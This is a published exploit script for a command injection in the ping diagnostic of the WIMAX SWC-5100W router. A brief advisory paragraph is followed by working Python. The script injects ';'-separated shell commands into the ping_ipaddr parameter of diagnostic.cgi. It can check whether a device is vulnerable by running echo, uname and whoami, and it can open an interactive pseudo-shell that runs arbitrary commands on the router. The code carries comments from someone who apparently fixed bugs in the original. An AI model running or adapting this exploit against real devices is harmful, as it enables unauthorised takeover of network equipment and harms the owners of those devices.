Authored by Momen Eldawakhly

The WIMAX SWC-5100W suffers from an authenticated remote command execution vulnerability: the `ping_ipaddr` parameter of the web UI's ping diagnostic (`/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping`) is passed to a shell unsanitised, so a `;`-separated command appended to the address is executed on the device and its output is reflected in the response page.

# Exploit Title: WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE
# Vulnerability Name: Ballin' Mada
# Date: 4/3/2023
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: http://www.seowonintech.co.kr/eng/main
# Version: Bootloader(1.18.19.0) , HW (0.0.7.0), FW(1.11.0.1 : 1.9.9.4)
# Tested on: Unix
# CVE : Under registration

import requests
import random,argparse
import sys
from colorama import Fore
from bs4 import BeautifulSoup

# Short aliases for the colorama escape sequences used in status messages.
red, green, cyan, yellow, reset = (
    Fore.RED,
    Fore.GREEN,
    Fore.CYAN,
    Fore.YELLOW,
    Fore.RESET,
)

# Command-line interface: a target plus one action flag.  Note that ``-t`` is
# optional here on purpose; the dispatch at the bottom falls back to printing
# usage when it (or an action flag) is missing.
argParser = argparse.ArgumentParser()
argParser.add_argument("-t", "--target", help="Target router")
argParser.add_argument("-rv", "--reverseShell", action="store_true", help="Obtain reverse shell")
argParser.add_argument("-tx", "--testExploit", action="store_true", help="Test exploitability")

args = argParser.parse_args()
# Module-level globals read by checkEXP()/revShell() and the dispatch below.
target, rev, testX = args.target, args.reverseShell, args.testExploit


# ASCII-art banner printed before every action; the leading and trailing
# newline of the original triple-quoted literal are preserved.
banner = "\n".join([
    "",
    "____ ____ ____ ____ ____ ____ ____ _________ ____ ____ ____ ____",
    "||B |||a |||l |||l |||i |||n |||' ||| |||M |||a |||d |||a ||",
    "||__|||__|||__|||__|||__|||__|||__|||_______|||__|||__|||__|||__||",
    "|/__|/__|/__|/__|/__|/__|/__|/_______|/__|/__|/__|/__|",
    "RCE 0day in WIMAX SWC-5100W",
    "[ Spell the CGI as in Cyber Guy ]",
    "",
])
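def checkEXP():
    """Probe the target for the ``ping_ipaddr`` command injection.

    Sends a harmless ``echo`` of a random marker through the injection point
    and looks for that marker in the rendered page.  Only when it is found
    does it send a second payload that reports kernel, working directory and
    user.  Reads the module-level ``target``; prints results and returns None.

    Fixes over the original: the marker that was actually sent is the one
    checked (the original tested a fixed marker with a mis-nested
    ``find() < 0 or find()`` that reported almost any 200 page as
    vulnerable), and the second payload is a valid string literal.
    """
    print(cyan + "[+] Checking if target is vulnerable" + reset)
    art = ['PWNED_1EE7', 'CGI AS IN CYBER GUY']
    marker = random.choice(art)
    base = (
        f"http://{target}/cgi-bin/diagnostic.cgi"
        "?action=Apply&html_view=ping&ping_count=10&ping_ipaddr="
    )
    # NOTE(review): the advisory calls this *authenticated* RCE, but no
    # credentials or session cookie are sent here; add them if the device
    # gates diagnostic.cgi behind its login.
    request = requests.get(url=base + ";echo 'PUTS(" + marker + ")';", proxies=None)
    if request.status_code != 200:
        print(red + "[+] Status code: " + str(request.status_code) + reset)
        return
    print(green + "[+] Status code: 200 success" + reset)
    page_text = BeautifulSoup(request.text, 'html.parser').get_text(" ")
    # A page that merely reflects the raw parameter would also contain this
    # string; the uname/pwd/whoami step below is the real confirmation.
    if "PUTS(" + marker + ")" not in page_text:
        print(red + "[+] Seems to be not vulnerable" + reset)
        return
    print(green + "[+] Target is vulnerable" + reset)
    # Output is wrapped in an anchor with a known id so it can be pulled out
    # of the surrounding HTML; '+' stands for a space once the CGI decodes it.
    payload = (
        ";echo+\"<a+id='pwned'>[*] Kernel: `uname+-a` -=-=- "
        "[*] Current directory: `pwd` -=-=- [*] User: `whoami`</a>\";"
    )
    uname = requests.get(url=base + payload)
    node = BeautifulSoup(uname.text, 'html.parser').find(id="pwned")
    if node is None:
        print(yellow + "[*] Marker echoed back but command output could not be parsed" + reset)
        return
    print(node.text)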


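def revShell():
    """Interactive pseudo-shell over the ``ping_ipaddr`` command injection.

    Despite the flag name this is not a reverse shell: each command is
    wrapped in ``echo "<a id='result'>`cmd`</a>"``, sent as a GET to
    diagnostic.cgi, and the anchor's text is printed.  ``exit``/``quit``
    terminate locally and are never sent to the device (the original sent
    them first).  An empty line returns.  Reads the module-level ``target``;
    calls ``sys.exit`` on exit/quit or Ctrl-C.

    Fixes over the original: valid string quoting for the payload, a loop
    instead of unbounded recursion, and a message instead of an
    AttributeError when no ``result`` anchor comes back.
    """
    base = (
        f"http://{target}/cgi-bin/diagnostic.cgi"
        "?action=Apply&html_view=ping&ping_count=10&ping_ipaddr="
    )
    try:
        while True:
            cmd = input("CGI #:- ")
            if not cmd:
                return
            if cmd == "exit" or cmd == "quit":
                print(yellow + "[*] Terminating ..." + reset)
                sys.exit(0)
            print(cmd)
            # A double quote inside cmd breaks out of the echo wrapper; the
            # original had the same limitation, so it is only documented here.
            payload = ";echo+\"<a+id='result'>`" + cmd + "`</a>\";"
            resp = requests.get(url=base + payload)
            node = BeautifulSoup(resp.text, 'html.parser').find(id="result")
            if node is None:
                print(red + "[-] No output returned (command failed or page layout changed)" + reset)
            else:
                print(node.text)
    except KeyboardInterrupt:
        sys.exit(0)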

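def help():
    """Print a usage summary for the script.

    Not wired to any flag (the dispatch uses argparse's own ``print_help``);
    kept for callers that import it.  The original also advertised a
    ``-fz, --fuzz`` option that the parser never defines, so that line has
    been dropped to avoid misleading users.
    """
    print(
        """
[+] Example: python3 pwnMada.py -t 192.168.1.1 -rv

[*] -t, --target :: Specify target to attack.
[*] -rv, --reverseShell :: Obtain reverse shell.
[*] -tx, --testExploit :: Test the exploitability of the target.
"""
    )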

# Entry point: the banner is printed on every path, then the requested
# action runs.  Without a target or an action flag, fall back to argparse's
# own usage text.
print(banner)
if target and rev:
    revShell()
elif target and testX:
    checkEXP()
else:
    argParser.print_help()